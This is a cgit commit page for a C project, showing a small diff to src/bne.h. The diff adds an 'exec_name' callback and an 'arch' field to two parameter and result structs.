aboutsummaryrefslogtreecommitdiff
path: root/src/bne.h
diff options
context:
space:
mode:
authorDavid Timber <mieabby@gmail.com>2020-09-19 03:15:28 +0930
committerDavid Timber <mieabby@gmail.com>2020-09-19 03:15:28 +0930
commit66a17c4bf5c38579e460209c2028d3275f366121 (patch)
treee169276fb0b1686abb01c0c5e794e96aaa253e13 /src/bne.h
parent54166c46f32555532dc3c0e922fe6a591cb74128 (diff)
Impl bne
Diffstat (limited to 'src/bne.h')
-rw-r--r--src/bne.h2
1 files changed, 2 insertions, 0 deletions
diff --git a/src/bne.h b/src/bne.h
index ca91a53..3dca3e5 100644
--- a/src/bne.h
+++ b/src/bne.h
@@ -32,6 +32,7 @@ struct prne_bne_param {
size_t cnt;
} vector;
struct {
+ char *(*exec_name)(void);
bool (*enter_dd)(void);
void (*exit_dd)(void);
} cb;
@@ -56,6 +57,7 @@ struct prne_bne_result {
int err;
prne_bne_vector_t vec;
prne_pack_rc_t prc;
+ prne_arch_t arch;
};
void prne_init_bne_param (prne_bne_param_t *p);